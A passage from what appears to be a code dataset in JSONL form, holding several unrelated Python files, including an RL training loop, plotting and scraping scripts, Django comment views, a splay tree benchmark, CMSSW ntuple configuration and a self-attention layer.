actions, rewards, advs, goals, nlps, vfs, states, init_goals)) \n #print(\"lrnow: {}, clipnow: {}\".format(lrnow, cliprangenow))\n mblossvals.append(model.train(lrnow, cliprangenow, encoefnow, *slices))\n \n ttrain = time.time()\n print(ttrain - tstats)\n\n else: # recurrent version\n rewards, vfs, nlps, inrs = model.av(obs, actions, rewards, dones, goals, states, init_goals)\n pre_vars = (obs,actions,rewards,dones,goals,nlps,vfs,states,inrs,init_goals) \n map_vars = (safe_vstack(arr, nbatch) for arr in pre_vars)\n (obs,actions,rewards,dones,goals,nlps,vfs,states,inrs,init_goals) = map_vars\n \n if not val:\n vre = vre * val_temp + np.apply_over_axes(np.mean, rewards, [0,1]) * (1-val_temp)\n vfs = np.reshape(np.repeat(vre, nbatch*neplength), [nbatch, neplength, nhier])\n rewards, advs = recurrent_mcret(actions, rewards, dones, vfs, lam=lam, gam=model.gam)\n \n feed_vars = (obs, actions, rewards, advs, goals, nlps, vfs, states, init_goals)\n mean_inr = np.mean(inrs, axis=(0,1))\n inds = np.arange(nbatch)\n for _ in range(noe):\n np.random.shuffle(inds)\n for start in range(0, nbatch, nbatch_train):\n end = start + nbatch_train\n mbinds = inds[0:nbatch_train]\n slices = (arr[mbinds] for arr in feed_vars)\n mblossvals.append(model.train(lrnow, cliprangenow, *slices))\n\n if update == 1 or update % test_interval == 0:\n obs, rewards, actions, dones, mbpi, init_goals, goals, s_actions, states, kepinfos = test_runner.run()\n rewards, vfs, nlps, inrs, vecs, sparse_inrs = \\\n model.av(obs, actions, rewards, dones, goals, states, init_goals)\n trajectories = decode_trajectories(obs[0,:-1])\n test_run_logger.logkv('update_number', update)\n for i in range(len(trajectories)):\n test_run_logger.logkv('state_{}'.format(i), '{}'.format(trajectories[i]))\n test_run_logger.logkv('goal_{}'.format(i), '{}'.format(decode(init_goals[0][i])))\n test_run_logger.logkv('inr_{}'.format(i), '{}'.format(inrs[0][i+1]))\n test_run_logger.logkv('act_{}'.format(i), '{}'.format(actions[0][i]))\n test_run_logger.logkv('s_act_{}'.format(i), '{}'.format(s_actions[0][i]))\n test_run_logger.dumpkvs()\n\n lossvals = np.mean(mblossvals, axis=0)\n tnow = time.time()\n fps = int(nbatch / (tnow - tstart))\n if update % log_interval == 0 or update == 1:\n if logger is not None:\n logger.logkv(\"serial_timesteps\", update*nsteps)\n logger.logkv(\"nupdates\", update)\n logger.logkv(\"total_timesteps\", update*nbatch)\n logger.logkv(\"fps\", fps)\n logger.logkv(\"exact_matches\", number_of_correct)\n for i in range(1, nhier):\n logger.logkv('intrinsic_reward_{}'.format(i), mean_inr[i] * neplength/(neplength - 1))\n if fixed_manager:\n logger.logkv('intrinsic_reward_sparse_{}'.format(i), mean_sparse_inr[i] * neplength/(neplength - 1))\n logger.logkv('eprewmean', safemean([epinfo['r'] for epinfo in epinfobuf]))\n logger.logkv('eplenmean', safemean([epinfo['l'] for epinfo in epinfobuf]))\n logger.logkv('time_elapsed', tnow - tfirststart)\n for (lossval, lossname) in zip(lossvals, model.loss_names):\n logger.logkv(lossname, lossval)\n logger.dumpkvs()\n env.close()\n\ndef safemean(xs):\n return np.nan if len(xs) == 0 else np.mean(xs)\n\n \n\n \n","sub_path":"baselines/feudal/feudal.py","file_name":"feudal.py","file_ext":"py","file_size_in_byte":15626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"623795996","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pylab\nimport matplotlib\nfrom datetime import datetime\nfilename='/Users/linfan/projects/zzd/t_S_Data/1$1S6350_copy'\na=0.7\nc='crimson'\nd='steelblue'\nl=1.5\nmaxi=995\nmini=504\nnumbers=[]\ntime =[]\ntemp=[]\nsalinity=[]\ndate = []\nfor line in file(filename):\n info = line.split()\n numbers.append(info[0])\n date.append(info[1])\n time.append(info[2])\n temp.append(info[3])\n salinity.append(info[4])\nfor i in range(0,len(temp)):\n temp[i]=float(temp[i].replace(',','.'))\n salinity[i]=float(salinity[i].replace(',','.')) \n date[i] = str(date[i].replace('.','-'))\n date[i] = date[i] + ' ' + time[i]\n date[i] = datetime.strptime(date[i],'%d-%m-%y %H:%M:%S')\ndate=date[mini:maxi]\ntemp=temp[mini:maxi]\nsalinity=salinity[mini:maxi]\nnumbers=numbers[mini:maxi]\n\nfilename='/Users/linfan/projects/zzd/t_S_Data/1$1S6343_copy'\ninfo=np.genfromtxt(filename,delimiter=',',dtype=str)\ninfo = np.array(info)\nday = info[:,1]\nT = info[:,2]\nsali1 = info[:,3]\nsali2 = info[:,4]\nsali1 = list(sali1)\nday = list(day)\nsali2 = list(sali2)\n\nfor i in range(0,len(T)):\n T[i]=float(T[i])/1000\n sali1[i]=sali1[i]+sali2[i]\n sali1[i] = str(sali1[i].replace('\"',''))\n sali1[i]=float(sali1[i])/10\n day[i] = str(day[i].replace('.','-'))\n day[i] = datetime.strptime(day[i],\"%d-%m-%y %H:%M:%S\")\n\n#plt.style.use('bmh')\nfig,ax1=pylab.subplots()\np1,=ax1.plot(date,temp,'-',color=c,lw=l,alpha=a,mec='none')\np3,=ax1.plot(day,T,'--',color=c,lw=l,alpha=a,mec='none')\nax1.yaxis.label.set_color(p1.get_color())\nax1.tick_params(axis='y', colors=p1.get_color())\nax1.set_ylabel('$Temperature$($\\degree C$)')\nax1.set_ylim(2,10)\nax1.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%b-%d'))\npylab.xlabel('$Date$')\npylab.legend(['6350','6343'],loc='lower right')\nax2=ax1.twinx()\np2,=ax2.plot(date,salinity,'-',color=d,lw=l,alpha=a,mec='none')\np4,=ax2.plot(day,sali1,'--',color=d,lw=l,alpha=a,mec='none')\nax2.set_ylim(20,32)\nax2.yaxis.label.set_color(p2.get_color())\nax2.tick_params(axis='y', colors=p2.get_color())\nax2.set_ylabel('$Salinity$')\npylab.title('$Sensor$ $6343&6350$, $2015$')\npylab.xlabel('$Date$')\npylab.xlim(day[1],date[-1])\n#pylab.savefig('figures/6343&6350.png',dpi=400,bbox_inches='tight')\npylab.show()\n\n","sub_path":"zzd/double_plot.py","file_name":"double_plot.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"627552316","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nwith open('simplehtml.html') as html_file:\r\n soup=BeautifulSoup(html_file ,'lxml')\r\n\r\narticles= soup.find_all('div' ,class_='article')\r\nfor article in articles:\r\n headline = article.h2.a.text\r\n print(headline)\r\n\r\n content = article.p.text\r\n print(content)\r\n print('\\n \\n')\r\n\r\n\r\n","sub_path":"FIRST ATTEPT TO WEBSCRAPE/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"509241911","text":"# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# or in the \"license\" file accompanying this file. This file is distributed\n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either\n# express or implied. See the License for the specific language governing\n# permissions and limitations under the License.\n\nimport pandas as pd\nimport numpy as np\n\nfrom gluonts.mx import SimpleFeedForwardEstimator, Trainer\n\n\ndef test_incremental_training_smoke_mx():\n estimator = SimpleFeedForwardEstimator(\n prediction_length=6,\n trainer=Trainer(epochs=2),\n )\n\n dataset = [\n {\"start\": pd.Period(\"2022-03-04 00\", \"1H\"), \"target\": np.ones((100,))},\n {\"start\": pd.Period(\"2022-04-05 00\", \"1H\"), \"target\": np.ones((100,))},\n ]\n\n predictor = estimator.train(dataset)\n _ = estimator.train_from(predictor, dataset)\n","sub_path":"test/mx/model/test_mx_incremental_training.py","file_name":"test_mx_incremental_training.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"454976695","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: D:\\dev\\cocos2020\\test\\test_schedule.py\n# Compiled at: 2020-01-10 23:58:31\n# Size of source mod 2**32: 1404 bytes\nfrom __future__ import division, print_function, unicode_literals\nimport sys, os\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))\ntestinfo = 't 0.1, s, t 2, s, t 4, s, q'\ntags = 'schedule, position'\nimport cocos\nimport cocos.director as director\nfrom cocos.sprite import Sprite\nimport pyglet, random\nfrom math import sin, cos\n\nclass TestLayer(cocos.layer.Layer):\n\n def __init__(self):\n super(TestLayer, self).__init__()\n self.sprite = Sprite('grossini.png')\n self.add(self.sprite)\n w, h = director.get_window_size()\n self.radius = h / 3.0\n self._elapsed = 0.0\n self.schedule(self.change_sprite_pos)\n self.change_sprite_pos(0.0)\n\n def change_sprite_pos(self, dt):\n self._elapsed += dt\n w, h = director.get_window_size()\n self.sprite.position = (w // 2 + self.radius * cos(self._elapsed * 1.5),\n h // 2 + self.radius * sin(self._elapsed * 1.5))\n\n\ndescription = '\\nGrossini sprite will circle around the center of the screen\\n'\n\ndef main():\n print(description)\n director.init()\n test_layer = TestLayer()\n main_scene = cocos.scene.Scene(test_layer)\n director.run(main_scene)\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/cocoscore-1.0.0-py2.py3-none-any/test_schedule.cpython-38.py","file_name":"test_schedule.cpython-38.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"29017327","text":"import json\n\n\ndef get_json(path, g):\n mode = g.get('mode')\n with open(path, 'r') as f:\n try:\n draw = int(g.get('draw', '1'))\n\n start = int(g.get('start', '0'))\n offset = int(g.get('offset', '0'))\n start = start if start != 0 else offset\n\n length = int(g.get('length', '0'))\n limit = int(g.get('limit', '9'))\n length = length if length != 0 else limit\n\n length = 20 if length > 20 else length\n\n json_load = json.load(f)\n if 'data' in json_load:\n init_json = json_load['data']\n else:\n init_json = []\n init_length = len(init_json)\n\n if mode == 'datatable':\n output = {}\n output['draw'] = draw\n output['recordsTotal'] = init_length\n output['recordsFiltered'] = init_length\n output['data'] = []\n for i in range(start, start + length):\n if i > init_length - 1:\n break\n output['data'].append(init_json[i])\n\n else:\n output = []\n for i in range(start, start + length):\n if i > init_length - 1:\n break\n output.append(init_json[i])\n\n except ValueError:\n output = {} if mode == 'datatable' else []\n\n return json.dumps(output)\n","sub_path":"cmscore.old/partial/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"422348378","text":"import matplotlib\nmatplotlib.use('Agg')\nfrom skimage import io\nfrom skimage import transform\nfrom numpy.linalg import svd\nimport numpy as np \nimport time,os,sys\nfrom math import log, floor\nimport pickle\nfrom random import shuffle\nimport argparse\nimport matplotlib.pyplot as plt\nfrom PIL import Image\ndef reconstruction(U,k,img,train_data_path,target_image):\n\tprint(target_image)\n\trecon_des = io.imread(os.path.join(train_data_path, target_image))\n\trecon_des = recon_des.flatten()\n\trecon_des = recon_des.astype(np.float)\n\trecon_des = recon_des / 255\n\tweight = []\n\tfor i in range(k):\n\t\teigenfaces = U[:,i]\n\t\tw = np.dot(recon_des,eigenfaces)\n\t\tweight.append(w)\n\trecon_img = np.zeros([len(recon_des),])\n\tfor i in range(len(weight)):\n\t\teigenfaces = U[:,i]\n\t\ttemp = weight[i]*eigenfaces\n\t\trecon_img = recon_img + temp\n\timg_mean = np.mean(img, axis=1)\n\trecon_img = recon_img + img_mean\n\n\treturn recon_img\ndef draw_reconstruct_image(recon_img):\n\trecon_img -= np.min(recon_img)\n\trecon_img /= np.max(recon_img)\n\trecon_img = (recon_img * 255).astype(np.uint8)\n\trecon_img = recon_img.reshape(600,600,3)\n\tplt.axis('off')\n\tplt.imshow(recon_img)\n\tplt.savefig('temp.png')\n\tImage.open('temp.png').save('reconstruction.jpg','JPEG')\n\treturn 'draw' \ndef main(opts):\n\ttrain_data_path = opts.train_data_path\n\ttarget_image = opts.target_image\n\tsave_dir = opts.save_dir\n\toutput_path = opts.output_path\n\tk = 4\n\tdirs = os.listdir(train_data_path)\n\t\n\tfor i,f in enumerate(dirs):\n\t\tif i == 0:\n\t\t\timg = io.imread(os.path.join(train_data_path, f))\n\t\t\timg = img.flatten()\n\t\t\timg = img.reshape(len(img),1)\n\t\t\tcontinue\n\t\ttemp_img = io.imread(os.path.join(train_data_path, f))\n\t\ttemp_img = temp_img.flatten()\n\t\ttemp_img = temp_img.reshape(len(temp_img),1)\n\t\timg = np.concatenate((img, temp_img), axis=1)\n\timg = img.astype(np.float)\n\timg = img / 255\n\tprint(img.shape)\n\timg_mean = np.mean(img, axis=1)\n\timg_mean = img_mean.reshape(len(img_mean),1)\n\tprint(img_mean.shape)\n\tU, s, V = svd(img - img_mean, full_matrices=False)\n\t#draw_reconstruct_image(U[:,3])\n\t\n\trecon_img = reconstruction(U,k,img,train_data_path,target_image)\n\tdraw_reconstruct_image(recon_img)\n\t\nif __name__ == '__main__':\n\t\n\tparser = argparse.ArgumentParser(description='image clustering dask')\n\tparser.add_argument('--train_data_path',type=str,default='Aberdeen/',dest='train_data_path',help='path to training data')\n\tparser.add_argument('--target_image',type=str,default='414.jpg',dest='target_image',help='path to testing data')\n\tparser.add_argument('--save_dir',type=str,default='models/',dest='save_dir',help='path to save the model parameters')\n\tparser.add_argument('--output_path',type=str,default='Result_output/result.csv',dest='output_path',help='path to save the model outputs')\n\t\n\topts = parser.parse_args()\n\n\tmain(opts)","sub_path":"hw6/pca_coloredfaces.py","file_name":"pca_coloredfaces.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"639933471","text":"import sys\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef get_phi_dfem(output_folder):\n num_cells = np.loadtxt(output_folder + \"number_of_cells\", dtype=int)\n num_nodes = np.loadtxt(output_folder + \"number_of_nodes\", dtype=int)\n num_groups = np.loadtxt(output_folder + \"number_of_groups\", dtype=int)\n cell_length = np.loadtxt(output_folder + \"cell_length\");\n phiout = np.loadtxt(output_folder + \"phi\")\n \n points = np.zeros(num_nodes*num_cells)\n tempsum = 0.\n for i in range(num_cells):\n points[num_nodes*i] = tempsum\n \n tempsum += cell_length[i]\n \n points[1 + num_nodes*i] = tempsum;\n \n phi = np.zeros((num_cells*num_nodes, num_groups))\n for i in range(num_cells):\n for g in range(num_groups):\n for n in range(num_nodes):\n phi[n + num_nodes*i, g] = phiout[n + num_nodes*(g + num_groups*i)]\n\n return points, phi\n\n\nif (len(sys.argv) != 2):\n print(\"usage: plot_error [dir]\")\n sys.exit()\n\ndirectory = sys.argv[1]\npoints, phi = get_phi_dfem(directory)\n\nplt.plot(points, phi)\nplt.savefig(directory + \"phi.pdf\")\n","sub_path":"python/dfem_plot.py","file_name":"dfem_plot.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"636847859","text":"# -*- coding:utf-8 -*-\nfrom django.shortcuts import redirect, get_object_or_404, HttpResponse\n\nfrom .forms import CommentsForm\nfrom .models import Comment\nfrom post.models import Post\nfrom user_info.models import UserInfo\nfrom user_info.views import delete_file\nfrom django.utils import timezone\n\nimport json\nimport random\n# Create your views here.\n\n\ndef create_comments(request, post_id):\n post = Post.objects.get(pk=post_id)\n form = CommentsForm(request.POST, request.FILES)\n if form.is_valid():\n obj = form.save(commit=False)\n obj.post = post\n obj.author = request.user\n obj.save()\n obj.patch_date = obj.pub_date\n obj.save()\n return redirect('/id%s' % post.page.id)\n return redirect('/')\n\n\ndef del_comments(request, comment_id):\n comment = Comment.objects.get(pk=comment_id)\n post = comment.post\n if request.user == comment.author or request.user == post.author or request.user == post.page:\n delete_file(comment)\n comment.delete()\n return redirect('/id%s' % post.page.id)\n return redirect('/')\n\n\ndef update_comment(request, comment_id):\n comment = Comment.objects.get(pk=comment_id)\n post = comment.post\n form = CommentsForm(request.POST, request.FILES)\n if form.is_valid() and request.user == comment.author:\n comment.body = request.POST['body']\n comment.patch_date = timezone.now()\n if 'image' in request.FILES:\n delete_file(comment)\n comment.image = request.FILES['image']\n comment.save()\n return redirect('/id%s' % post.page.id)\n return redirect('/')\n\n\ndef like_comment(request, comment_id):\n comment = get_object_or_404(Comment, pk=comment_id)\n likes = comment.likes.all()\n if request.user not in likes:\n comment.likes.add(request.user)\n else:\n comment.likes.remove(request.user)\n comment.save()\n return redirect(request.META.get('HTTP_REFERER') + '#comment_%s' % (comment_id))\n\n\ndef like_comment_ajax(request):\n if request.method == 'POST':\n comment = Comment.objects.get(pk=request.POST.get('id', ''))\n if not comment:\n return HttpResponse('Ошибка 37...', content_type='text/html')\n likes = comment.likes.all()\n data = dict()\n if request.user not in likes:\n comment.likes.add(request.user)\n data['type'] = 'like'\n else:\n comment.likes.remove(request.user)\n data['type'] = 'dislike'\n else:\n return HttpResponse('Ошибка 37...', content_type='text/html')\n comment.like_list = comment.likes.all()\n comment.like_number = comment.likes.count()\n if comment.like_number > 4:\n comment.rand_like = list()\n if request.user in comment.like_list:\n comment.rand_like.append(request.user)\n j = random.sample(range(0, comment.like_number), 4)\n for i in j:\n if comment.likes.all()[i] == request.user:\n pass\n else:\n comment.rand_like.append(comment.likes.all()[i])\n if len(comment.rand_like) == 4:\n break\n else:\n j = random.sample(range(0, comment.like_number), 4)\n for i in j:\n comment.rand_like.append(comment.likes.all()[i])\n else:\n comment.rand_like = list()\n if request.user in comment.like_list:\n comment.rand_like.append(request.user)\n for i in comment.like_list:\n if i != request.user:\n comment.rand_like.append(i)\n for i in comment.rand_like:\n i.info = UserInfo.objects.get(user=i.id)\n data['like_num'] = comment.like_number\n return HttpResponse(json.dumps(data), content_type='text/html')\n","sub_path":"comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"448506310","text":"#!/usr/bin/python\nimport os\nimport sqlite3\nfrom utils import SIFT\nfrom utils import getImageHashValues\nimport numpy as np\n\nconn = sqlite3.connect('datasets.db')\nprint(\"Opened database successfully\")\nc = conn.cursor()\nKV = []\n\n# images\nc.execute(\"INSERT INTO DATASET (ID,NAME,TYPE,ADDRESS) \\\n VALUES (2, 'Image Dataset', 'IMAGE', 'IMDS')\")\n\nc.execute('''CREATE TABLE IMDS\n (ID INTEGER PRIMARY KEY AUTOINCREMENT,\n NAME CHAR(20) NOT NULL,\n ADDRESS char(80) NOT NULL,\n HASH BLOB NOT NULL);''')\n\nimage_root = 'Image/mirflickr1m/images';\ndef getRelativePath(path):\n return path[path.find(image_root):]\n\ndef abs(x):\n if x < 0:\n return -x\n return x\n\ndef dis(a, b):\n d = 0\n for i in range(len(a)):\n d += abs(a[i]-b[i])\n return d\n\ndef nearest(v):\n min = 99999999999\n ans = []\n for s in KV:\n d = dis(s, v)\n if d < min:\n min = d\n ans = s\n return ans\n\ndef visitPath(path):\n list = os.listdir(path)\n for file in list:\n _path = path + '/' + file\n if os.path.isfile(_path):\n kpdes = SIFT(_path)\n vectors = kpdes[1]\n print('Old vector: ', vectors)\n vectors_new = []\n for v in vectors:\n vectors_new.append(nearest(v))\n print('New vector: ',vectors_new)\n hashvalue = getImageHashValues(vectors_new).tobytes()\n c.execute(\"insert into IMDS values (null, ?, ?, ?)\", (file, getRelativePath(_path), hashvalue))\n c.execute(\"insert into IMDS values (null, ?, ?, ?)\", (file, getRelativePath(_path), 0))\n else:\n visitPath(_path)\n\nKV = np.load('../Image/mirflickr1m/centroid/0-iteration.npy')\nif os.path.exists(image_root):\n visitPath(image_root)\nelse:\n visitPath('../' + image_root)\nconn.commit()\nconn.close()","sub_path":"database_image.py","file_name":"database_image.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"80032851","text":"import time\nimport random\nfrom collections import OrderedDict\n\nfrom Splay import Splay\n\n\ndef randomized():\n print(\"#########################\")\n print(\"Random distribution of data\")\n print(\"#########################\")\n operations = OrderedDict({\n \"Insert\": lambda b, x: b.insert(x),\n \"Search\": lambda b, x: b.search(x),\n \"Delete\": lambda b, x: b.delete(x),\n })\n for n in range(1000, 100001, 2000):\n b = Splay()\n for name in operations:\n start = time.time()\n op = operations[name]\n for i in random.sample(range(0, n), n):\n op(b, i)\n elapsed = time.time() - start\n print('{},{},{}'.format(name, n, round(1000 * elapsed, 4)))\n\n\ndef recurring():\n print(\"#########################\")\n print(\"Recurring data\")\n print(\"#########################\")\n for n in range(1000, 100000, 2000):\n b = Splay()\n for i in random.sample(range(0, n), n):\n b.insert(i)\n start = time.time()\n for i in [random.randint(400, 405) for _ in range(n)]:\n b.search(i)\n\n elapsed = time.time() - start\n print('{}'.format(round(1000 * elapsed, 4)))\n\n\ndef sequential():\n print(\"#########################\")\n print(\"Sequential data\")\n print(\"#########################\")\n operations = OrderedDict({\n \"Insert\": lambda b, x: b.insert(x),\n \"Search\": lambda b, x: b.search(x),\n \"Delete\": lambda b, x: b.delete(x),\n })\n for n in range(10, 1001, 20):\n b = Splay()\n for name in operations:\n op = operations[name]\n values = list(range(n))\n if name == \"Delete\":\n values.reverse()\n start = time.time()\n for i in values:\n op(b, i)\n elapsed = time.time() - start\n print('{},{},{}'.format(name, n, round(1000 * elapsed, 4)))\n\n\ndef run():\n print(\"** Splay Tree **\")\n randomized()\n recurring()\n sequential()","sub_path":"report/report_Splay.py","file_name":"report_Splay.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"361739923","text":"import FWCore.ParameterSet.Config as cms\n\n\neventBranches = cms.PSet(\n floats = cms.PSet(\n pvndof = cms.string('pvndof'),\n pvZ = cms.string('pvZ'),\n pvRho = cms.string('pvRho'),\n type1_pfMETEt = cms.string('type1_pfMETEt'),\n type1_pfMETPhi = cms.string('type1_pfMETPhi'),\n Flag_BadPFMuonFilterPass = cms.string('? hasUserFloat(\"Flag_BadPFMuonFilterPass\") ? '\n 'userFloat(\"Flag_BadPFMuonFilterPass\") : 100'),\n Flag_BadChargedCandidateFilterPass = cms.string('? hasUserFloat(\"Flag_BadChargedCandidateFilterPass\") ? '\n 'userFloat(\"Flag_BadChargedCandidateFilterPass\") : 100'),\n ),\n vFloats = cms.PSet(\n jetPt = cms.vstring('jetPt'),\n jetEta = cms.vstring('jetEta'),\n jetPhi = cms.vstring('jetPhi'),\n jetDeepCSV = cms.vstring('jetDeepCSV'),\n ),\n vInts = cms.PSet(\n jetPUID = cms.vstring('jetPUID'),\n isGenJetMatched = cms.vstring('isGenJetMatched'),\n jetHadronFlavor = cms.vstring('jetHadronFlavor'),\n ),\n bools = cms.PSet(\n pvIsValid = cms.string('pvIsValid'),\n pvIdFake = cms.string('pvIsFake'),\n ),\n uints = cms.PSet(\n lumi = cms.string('lumi'),\n run = cms.string('run'),\n nvtx = cms.string('nvtx'),\n nJets = cms.string('nJets'),\n ),\n ulls = cms.PSet(\n evt = cms.string('evt'),\n ),\n )\nL1ECALPrefiringBranches = cms.PSet(\n floats = cms.PSet(\n L1prefiringWeight = cms.string('L1prefiringWeight'),\n L1prefiringWeightUp = cms.string('L1prefiringWeightUp'),\n L1prefiringWeightDn = cms.string('L1prefiringWeightDn'),\n ),\n )\nlheScaleWeightBranches = cms.PSet(\n vFloats = cms.PSet(\n scaleWeights = cms.vstring('lheWeights::0,9'),\n ),\n floats = cms.PSet(\n minScaleWeight = cms.string('minLHEWeight::0,9'),\n maxScaleWeight = cms.string('maxLHEWeight::0,9'),\n ),\n )\n\nlheScaleAndPDFWeightBranches = cms.PSet(\n vFloats = cms.PSet(\n scaleWeights = cms.vstring('lheWeights::0,9'),\n pdfWeights = cms.vstring('lheWeights::9,111'),\n ),\n floats = cms.PSet(\n minScaleWeight = cms.string('minLHEWeight::0,9'),\n maxScaleWeight = cms.string('maxLHEWeight::0,9'),\n ),\n )\n\nlheAllWeightBranches = cms.PSet(\n vFloats = cms.PSet(\n scaleWeights = cms.vstring('lheWeights::0,9'),\n pdfWeights = cms.vstring('lheWeights::9,9999'),\n ),\n floats = cms.PSet(\n minScaleWeight = cms.string('minLHEWeight::0,9'),\n maxScaleWeight = cms.string('maxLHEWeight::0,9'),\n ),\n )\n\n# gen information branches for regular ntuple\neventGenBranches = cms.PSet(\n floats = cms.PSet(\n genWeight = cms.string('genWeight'),\n nTruePU = cms.string('nTruePU'),\n originalXWGTUP=cms.string('originalXWGTUP'),\n ),\n )\n\n# event branches for gen ntuple\ngenNtupleEventBranches = cms.PSet(\n floats = cms.PSet(\n genWeight = cms.string('genWeight'),\n ),\n vFloats = cms.PSet(\n jetPt = cms.vstring('genJetPt'),\n jetEta = cms.vstring('genJetEta'),\n jetPhi = cms.vstring('genJetPhi'),\n ),\n uints = cms.PSet(\n lumi = cms.string('lumi'),\n run = cms.string('run'),\n nJets = cms.string('nGenJets'),\n ),\n ulls = cms.PSet(\n evt = cms.string('evt'),\n ),\n )\n\njetSystematicBranches = cms.PSet(\n floats = cms.PSet(\n jetPUSFmulfac = cms.string('jetPUSFmulfac'),\n ),\n vFloats = cms.PSet(\n jetPt_jesUp = cms.vstring('jetPt::jesUp'),\n jetPt_jesDown = cms.vstring('jetPt::jesDown'),\n jetPt_jerUp = cms.vstring('jetPt::jerUp'),\n jetPt_jerDown = cms.vstring('jetPt::jerDown'),\n jetEta_jesUp = cms.vstring('jetEta::jesUp'),\n jetEta_jesDown = cms.vstring('jetEta::jesDown'),\n jetEta_jerUp = cms.vstring('jetEta::jerUp'),\n jetEta_jerDown = cms.vstring('jetEta::jerDown'),\n ),\n vInts = cms.PSet(\n jetPUID_jesUp = cms.vstring('jetPUID::jesUp'),\n jetPUID_jesDown = cms.vstring('jetPUID::jesDown'),\n jetPUID_jerUp = cms.vstring('jetPUID::jerUp'),\n jetPUID_jerDown = cms.vstring('jetPUID::jerDown'),\n ),\n uints = cms.PSet(\n nJets_jesUp = cms.string('nJets::jesUp'),\n nJets_jesDown = cms.string('nJets::jesDown'),\n nJets_jerUp = cms.string('nJets::jerUp'),\n nJets_jerDown = cms.string('nJets::jerDown'),\n ),\n )\n\n# gen-level initial state info for reco ntuple\ngenInitialStateBranches = cms.PSet(\n floats = cms.PSet(\n GenMass = cms.string('genInitialStateMass'),\n GenPt = cms.string('genInitialStatePt'),\n GenEta = cms.string('genInitialStateEta'),\n GenPhi = cms.string('genInitialStatePhi'),\n ),\n )\n\ndressedGenCompositeStateBranches = cms.PSet(\n floats = cms.PSet(\n UndressedMass = cms.string('undressedMass'),\n UndressedPt = cms.string('undressedPt'),\n UndressedEta = cms.string('undressedEta'),\n UndressedPhi = cms.string('undressedPhi'),\n ),\n )\n","sub_path":"Ntuplizer/python/templates/eventBranches.py","file_name":"eventBranches.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"92979668","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport capslayer as cl\nimport tensorflow as tf\n\n\ndef selfAttention(x, ch, name='attention'):\n '''\n Self-Attention mechanism from: https://github.com/taki0112/Self-Attention-GAN-Tensorflow\n '''\n with tf.compat.v1.variable_scope(name):\n\n f = tf.layers.conv2d(x, ch // 8, kernel_size=1, strides=1) \n g = tf.layers.conv2d(x, ch // 8, kernel_size=1, strides=1)\n h = tf.layers.conv2d(x, ch // 1, kernel_size=1, strides=1)\n\n # N = h * w\n s = tf.matmul(hw_flatten(g), hw_flatten(f), transpose_b=True) # # [bs, N, N]\n\n beta = tf.nn.softmax(s) # attention map\n\n o = tf.matmul(beta, hw_flatten(h)) # [bs, N, C]\n gamma = tf.get_variable(\"gamma\", [1], initializer=tf.constant_initializer(0.0))\n\n shape = cl.shape(x)\n o = tf.reshape(o, shape=shape) # [bs, h, w, C]\n\n # check this out: SACN doesn't use this 1x1 conv, but SAGAN does\n o = tf.layers.conv2d(o, ch, kernel_size=1, strides=1)\n\n x = gamma * o + x\n\n return x\n\n\ndef hw_flatten(x) :\n shape = cl.shape(x)\n return tf.reshape(x, [-1, shape[1]*shape[2], shape[3]])\n","sub_path":"capslayer/layers/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"53247649","text":"from flask import Flask\r\nfrom flask import render_template\r\nimport requests\r\nimport json\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/home')\r\ndef homepage():\r\n #Print(\"Is this thing on?\")\r\n return \"

Hello World!

